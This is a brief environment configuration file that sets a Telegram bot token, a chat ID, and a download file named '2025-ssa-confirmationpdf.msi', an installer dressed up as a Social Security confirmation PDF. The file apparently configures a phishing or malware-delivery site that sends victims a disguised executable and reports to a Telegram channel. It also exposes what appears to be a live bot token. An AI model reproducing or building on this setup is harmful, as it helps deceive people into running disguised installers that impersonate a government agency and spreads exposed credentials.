TELEGRAM_BOT_TOKEN=7620171875:AAG39e8uAQxRIu5DmZ1JWpvMc7Geo_MN_go
TELEGRAM_CHAT_ID=-4737057398
# Download file path - the filename in the protected/ folder to serve for downloads
DOWNLOAD_FILE_PATH=2025-ssa-confirmationpdf.msi